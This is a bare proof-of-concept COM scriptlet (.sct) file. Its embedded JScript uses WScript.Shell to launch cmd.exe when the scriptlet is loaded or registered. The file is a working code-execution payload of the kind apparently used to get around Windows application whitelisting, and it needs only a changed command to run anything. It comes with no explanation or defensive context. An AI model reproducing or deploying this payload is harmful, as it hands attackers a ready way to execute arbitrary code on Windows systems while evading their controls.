<?XML version="1.0"?>
<scriptlet>
<registration 
    progid="PoC"
    classid="{F0002222-0000-0000-0000-0000ADECBCDA}" >
	<script language="JScript">
		<![CDATA[
	
			var r = new ActiveXObject("WScript.Shell").Run("cmd.exe");	
	
		]]>
</script>
</registration>
</scriptlet>
